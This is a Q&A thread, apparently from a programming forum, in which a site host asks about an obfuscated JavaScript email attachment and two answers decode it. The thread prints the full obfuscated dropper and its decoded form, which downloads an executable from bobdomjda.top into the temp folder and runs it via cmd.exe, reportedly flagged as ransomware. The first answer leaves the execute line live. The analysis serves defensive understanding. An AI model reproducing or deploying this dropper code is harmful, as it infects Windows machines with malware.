
So some background. I currently host a few small sites for my clients. I use cPanel.

Recently, I received an email on my server with a zip file. The zip file contains the following code:

/**
 * Parses a string of hexadecimal digits into a number.
 * In this sample the helper is defined twice and never called: the decoder
 * string built in yneepaqzwu() inlines parseInt(..., 16) instead, so this is
 * filler that contributes nothing to what the script does.
 * @param {string} luezhqtygz - hex digits (parseInt also tolerates a leading "0x")
 * @returns {number} the parsed value, or NaN when no leading hex digit is present
 */
function jqmqmkrehl(luezhqtygz)
{
	var hexRadix = 16;
	return Number.parseInt(luezhqtygz, hexRadix);
}
function jvqissrxgt()
{
	// Returns one random non-whitespace character from "val12312312". As rendered on
	// this page the regex is /S{1}/, which only matches a literal capital "S", so
	// match() yields null and the indexing below throws; the original most likely read
	// /\S{1}/ (the /\S{2}/ regex inside yneepaqzwu() still has its backslash), so the
	// backslash was probably lost when the question was formatted.
	// The caller appends three of these picks to the letter "e"; the name of the
	// function it ends up invoking ("eval") is therefore never written out as a token
	// and only appears at run time once the random draws line up.
	var ftytqpuqjd="val12312312".match(/S{1}/g);
	// Math["floo"+""+"r"] is Math.floor, spelled so that "floor" is not a literal either.
	return ftytqpuqjd[Math["floo"+""+"r"](Math.random()*ftytqpuqjd.length)];
}
/**
 * Second, identical definition of the hex-to-number helper (a later function
 * declaration with the same name simply replaces the earlier one). Nothing in
 * the sample calls it; duplicated dead code like this is typical padding in
 * obfuscated droppers.
 * @param {string} luezhqtygz - hex digits to parse
 * @returns {number} parsed value, or NaN when the string has no leading hex digit
 */
function jqmqmkrehl(luezhqtygz)
{
	var parsed = Number.parseInt(luezhqtygz, 16);
	return parsed;
}
function sehudasphf()
{
	// Returns the obfuscated payload: a hex string (two digits per byte) that
	// yneepaqzwu() XOR-decodes with a 12-byte key back into the JavaScript shown in
	// the answers below. As stored, the blob contains nothing searchable — no URL, no
	// COM class names — which is the purpose of the encoding; a static scan of this
	// file sees only a long hex constant.
	var a = 1; // unused; dead-code filler
	var lzpxyboxat="f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
	"c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
	"7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
	"f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
	"99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
	"4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
	"bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
	"874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
	"414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
	"f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
	"9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
	"5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
	"c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
	"8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
	"4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
	"f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
	"881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
	return lzpxyboxat;
}
function yneepaqzwu(yluyzuvvps)
{
	// Decodes the hex blob it is given (see sehudasphf) and executes the result.
	// The decoder itself is assembled from a string with `new Function`, so its logic
	// is not visible as ordinary source. Reading that string:
	//   - 12-byte XOR key: 150,130,98,197,235,63,236,120,60,54,105,159
	//   - the input is split into two-hex-digit pairs (/\S{2}/g); each pair is
	//     parseInt(pair,16), XORed with the next key byte (wrapping every 12), and
	//     appended to the output as a character;
	//   - the string then ends with `e` + three random characters from jvqissrxgt()
	//     + `(decoded)`, i.e. a call whose name is only known at run time.
	// Only when the three draws spell a name that exists ("val" -> eval) does the
	// call succeed; any other draw throws a ReferenceError, which the empty catch
	// swallows, and the while(true) tries again. If the draw can never succeed
	// (jvqissrxgt() returning null, as the regex on this page is rendered) the loop
	// never terminates — a CPU-bound hang rather than an infection.
	// For analysis purposes the answers below show what the decoded string is;
	// a sandbox sees this as eval of dynamically built code.
	var mfjvremiuf;
	while(true){
		try
		{
			// The generated Function body has no return statement, so the value stored
			// here is always undefined; the call is made purely for its side effect.
			mfjvremiuf=(new Function("uneuuflaii","var zkyczguxoo=new Array(150,130,98,197,235,63,236,120,60,54,105,159),htcpxtvter=uneuuflaii.match(/\S{2}/g),xjrefvhonb="",ftvjsrrtfs=0;for(var ftvjsrrtfs=0,wgwizxghjb=0;ftvjsrrtfs<htcpxtvter.length;ftvjsrrtfs++,wgwizxghjb++){if(wgwizxghjb>=zkyczguxoo.length){wgwizxghjb=0;}xjrefvhonb+=String.fromCharCode(parseInt(htcpxtvter[ftvjsrrtfs],16)^zkyczguxoo[wgwizxghjb]);}e"+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+"(xjrefvhonb);")(yluyzuvvps));
			break;
		}
		catch(er)
		{
			// Intentionally empty: a wrong guess at the function name is simply retried.
		}
	}
	return mfjvremiuf;
}
// Entry point: decode the hex payload and eval it. Everything observable (network
// request, file write, process launch) happens inside the decoded code, not here.
yneepaqzwu(sehudasphf());

All I know is that it is a javascript file, but I have no idea what this does. Can anyone enlighten me?
(P.S. I am literally brand new to programming.)


Answers


  1. Here is what it does: The code decrypts the long string variable (var lzpxyboxat="f0f70ca69f5683161c510c...). The decrypted string is again JavaScript code, which is then executed. This is the decrypted code:

    /**
     * Fetches `url` synchronously through the MSXML2.XMLHTTP COM object and passes
     * the raw response bytes (ResponseBody, not the text) to callback(body, false).
     * Any non-200 status or any exception becomes callback(null, true), so the caller
     * never learns why a download failed. `ActiveXObject` exists only in the Windows
     * Script Host / Internet Explorer engines, which is why this chain is Windows-only.
     * @param {string} url
     * @param {function(*, boolean)} callback - (body, errorFlag)
     */
    function getDataFromUrl(url, callback) {
        try {
            var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
            // Third argument false = synchronous request; the script blocks until it completes.
            xmlHttp.open("GET", url, false);
            xmlHttp.send();
            if (xmlHttp.status == 200) {
                return callback(xmlHttp.ResponseBody, false);
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    /**
     * Downloads the payload, trying the same URL up to three times (nested callbacks
     * instead of a loop). The first successful body is passed to callback(body, false);
     * if all three attempts fail, callback(null, true).
     * http://bobdomjda.top/admin.php?f=2.gif is the payload host; the ".gif" suffix is
     * cosmetic — the answer text and the ".exe" written later show the response is an
     * executable. For detection, an HTTP GET to this path issued by a script host rather
     * than a browser is the earliest observable of the chain.
     * @param {function(*, boolean)} callback - (body, errorFlag)
     */
    function getData(callback) {
        try {
            getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                if (!error) {
                    return callback(result, false);
                } else {
                    // Second attempt, identical URL.
                    getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                        if (!error) {
                            return callback(result, false);
                        } else {
                            // Third and last attempt.
                            getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                                if (!error) {
                                    return callback(result, false);
                                } else {
                                    return callback(null, true);
                                }
                            });
                        }
                    });
                }
            });
        } catch (error) {
            // Only synchronous throws land here; getDataFromUrl already catches its own.
            return callback(null, true);
        }
    }
    
    /**
     * Builds the drop path: the user's temporary folder plus a random 9-character
     * base-36 name with an ".exe" extension (the second answer's example "owynovqn2.exe").
     * Returns false instead of throwing when the FileSystemObject is unavailable.
     * @returns {string|boolean} full path, or false on error
     */
    function getTempFilePath() {
        try {
            var fs = new ActiveXObject("Scripting.FileSystemObject");
            // NOTE(review): as rendered the literal is "\" — almost certainly "\\" (a path
            // separator) in the original; a backslash seems to have been lost on this page,
            // as with the regexes in the obfuscated script.
            var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
            // GetSpecialFolder(2) is the TemporaryFolder constant (%TEMP%).
            var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
            return tmpFilePath;
        } catch (error) {
            return false;
        }
    }
    
    /**
     * Writes the downloaded bytes to the random %TEMP%\*.exe path via ADODB.Stream and
     * reports the path through callback(path, false); any failure (no path, COM error)
     * becomes callback(null, true). A script host creating an ADODB.Stream and saving an
     * .exe into the temp folder is the file-system observable of this dropper.
     * @param {*} data - raw response bytes from getDataFromUrl
     * @param {function(?string, boolean)} callback - (path, errorFlag)
     */
    function saveToTemp(data, callback) {
        try {
            var path = getTempFilePath();
            if (path) {
                var objStream = new ActiveXObject("ADODB.Stream");
                objStream.Open();
                objStream.Type = 1; // adTypeBinary: write bytes, not text
                objStream.Write(data);
                objStream.Position = 0;
                objStream.SaveToFile(path, 2); // adSaveCreateOverWrite
                objStream.Close();
                return callback(path, false);
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    // Entry point of the decoded payload: download -> write %TEMP%\<random>.exe -> run it.
    getData(function (data, error) {
        if (!error) {
            saveToTemp(data, function (path, error) {
                if (!error) {
                    try {
                        var wsh = new ActiveXObject("WScript.Shell");
                        // Launches the dropped executable, then deletes every .js file in the
                        // current directory so the dropper script removes itself. This call is
                        // live in this listing (the second answer's copy comments it out).
                        // The process tree to look for is the script host (typically
                        // wscript.exe) -> cmd.exe -> a random-named .exe from %TEMP%.
                        wsh.Run("cmd.exe /c start " + path + " & del *.js");
                    } catch (error) {
                        // A failed launch is silently ignored.
                    }
                }
            });
        }
    });
    

    This code downloads a file from the URL (WARNING: potentially malicious file) http://bobdomjda.top/admin.php?f=2.gif. The file is saved in the temporary files folder and executed with cmd.exe /c start [filename].

    As far as I can see, the downloading and execution will only work on Windows systems, because every step relies on ActiveX objects (MSXML2.XMLHTTP, Scripting.FileSystemObject, ADODB.Stream, WScript.Shell) that only the Windows Script Host / Internet Explorer engines provide.

    I uploaded the file to VirusTotal: analysis result.

  2. Deobfuscating your script yields:

    // The obfuscated payload exactly as it appears in the sample (lzpxyboxat there):
    // hex text, two digits per byte, XOR-encoded with the 12-byte key used in decrypt().
    // Decoding it gives the JavaScript shown further down.
    var encrypted =
        "f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
        "c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
        "7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
        "f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
        "99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
        "4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
        "bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
        "874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
        "414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
        "f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
        "9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
        "5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
        "c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
        "8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
        "4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
        "f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
        "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
    
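    /**
     * Reverses the sample's XOR obfuscation.
     *
     * The input is hex text, two digits per byte; each byte is XORed with the
     * next byte of the 12-byte key (cycling through the key) and appended to the
     * output as a character. Applied to the `encrypted` string above it yields the
     * JavaScript shown further down.
     *
     * Two fixes relative to the listing as first posted: the body read `encoded`,
     * which is not defined anywhere (ReferenceError on every call), and the regex
     * had lost its backslash in rendering (`/S{2}/` matches only a literal "S"; the
     * obfuscated sample uses `/\S{2}/`). Whitespace between pairs is skipped because
     * the regex only matches non-whitespace; an empty or whitespace-only input
     * decodes to "" instead of throwing on a null match result.
     *
     * @param {string} encrypted - hex-encoded, XOR-obfuscated text
     * @returns {string} the decoded text
     */
    function decrypt(encrypted) {
        var key = [150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159];
        var bytes = encrypted.match(/\S{2}/g) || [];
        var code = "";

        for (var i = 0; i < bytes.length; i++) {
            // i % key.length replaces the original's manually wrapped second counter.
            code += String.fromCharCode(parseInt(bytes[i], 16) ^ key[i % key.length]);
        }

        return code;
    }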
    
    // eval(decrypt(encrypted)); // commented out to prevent accidental execution
    

    The script contains encrypted JavaScript code and a decrypt function based on a simple XOR cipher.

    Decrypting the encrypted code yields:

    /**
     * Synchronous HTTP GET through the MSXML2.XMLHTTP COM object. On a 200 response the
     * raw bytes (ResponseBody) go to callback(body, false); any other status or any
     * exception becomes callback(null, true), discarding the reason. `ActiveXObject` is
     * only available in Windows Script Host / Internet Explorer, hence Windows-only.
     * @param {string} url
     * @param {function(*, boolean)} callback - (body, errorFlag)
     */
    function getDataFromUrl(url, callback) {
        try{
            var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
            // false = synchronous; the script blocks until the request completes.
            xmlHttp.open("GET", url, false);
            xmlHttp.send();
            if (xmlHttp.status == 200) {
                return callback(xmlHttp.ResponseBody, false);
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    /**
     * Downloads the payload from http://bobdomjda.top/admin.php?f=2.gif, retrying the
     * same URL up to three times via nested callbacks. First success ->
     * callback(body, false); three failures -> callback(null, true). The ".gif" name is
     * a disguise: the bytes are written out as an .exe below. An HTTP GET to this path
     * from a script host (not a browser) is the network indicator to hunt for.
     * @param {function(*, boolean)} callback - (body, errorFlag)
     */
    function getData(callback) {
        try {
            getDataFromUrl(
                "http://bobdomjda.top/admin.php?f=2.gif",
                function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Second attempt, same URL.
                        getDataFromUrl(
                            "http://bobdomjda.top/admin.php?f=2.gif",
                            function(result, error) {
                                if (!error) {
                                    return callback(result, false);
                                } else {
                                    // Third and final attempt.
                                    getDataFromUrl(
                                        "http://bobdomjda.top/admin.php?f=2.gif",
                                        function(result, error) {
                                            if (!error) {
                                                return callback(result, false);
                                            } else {
                                                return callback(null, true);
                                            }
                                        }
                                    );
                                }
                            }
                        );
                    }
                }
            );
        } catch (error) {
            // Only synchronous throws reach here; getDataFromUrl catches its own.
            return callback(null, true);
        }
    }
    
    /**
     * Builds the drop path: the temporary folder plus a random 9-character base-36
     * name ending in ".exe" (e.g. "owynovqn2.exe", as the answer text notes).
     * Returns false rather than throwing if the FileSystemObject cannot be created.
     * @returns {string|boolean} full path, or false on error
     */
    function getTempFilePath() {
        try {
            var fs = new ActiveXObject("Scripting.FileSystemObject");
            // NOTE(review): the literal shows as "\" here — presumably "\\" (a path
            // separator) in the original; one backslash appears lost in rendering, as
            // with the regexes elsewhere on this page.
            var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
            // GetSpecialFolder(2) is the TemporaryFolder constant (%TEMP%).
            var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
            return tmpFilePath;
        } catch (error) {
            return false;
        }
    }
    
    /**
     * Writes the downloaded bytes to the random %TEMP%\*.exe via ADODB.Stream and
     * hands the path to callback(path, false); no path or any COM error ->
     * callback(null, true). A script host writing an .exe into %TEMP% through
     * ADODB.Stream is the file-system indicator of this dropper.
     * @param {*} data - raw response bytes
     * @param {function(?string, boolean)} callback - (path, errorFlag)
     */
    function saveToTemp(data, callback) {
        try {
            var path = getTempFilePath();
            if (path) {
                var objStream = new ActiveXObject("ADODB.Stream");
                objStream.Open();
                objStream.Type = 1; // adTypeBinary
                objStream.Write(data);
                objStream.Position = 0;
                objStream.SaveToFile(path, 2); // adSaveCreateOverWrite
                objStream.Close();
                return callback(path, false);
            } else {
                return callback(null, true);
            }
        } catch (error) {
            return callback(null, true);
        }
    }
    
    // Entry point of the decoded payload: download -> write %TEMP%\<random>.exe -> run.
    getData(
        function (data, error) {
            if (!error) {
                saveToTemp(
                    data,
                    function (path, error) {
                        if (!error) {
                            try {
                                var wsh = new ActiveXObject("WScript.Shell");
                                // The commented-out Run would start the dropped executable and
                                // then delete every .js in the current directory (the script
                                // removing itself). Process tree if it did run: script host
                                // (typically wscript.exe) -> cmd.exe -> random-named .exe.
                                // wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
                            } catch (error) {}
                        }
                    }
                );
            }
        }
    );
    

    This script

    1. Downloads an executable file from http://bobdomjda.top/admin.php?f=2.gif
    2. Uses ActiveX (“Scripting.FileSystemObject”, “ADODB.Stream”) to save it on your local filesystem as e.g. “owynovqn2.exe”
    3. Uses ActiveX (“WScript.Shell”) to execute it.

    According to virustotal.com, 8 of 61 virus scanners recognize the executable file as malicious, e.g. McAfee classifies it as “BehavesLike.Win32.Ransom.dc”.
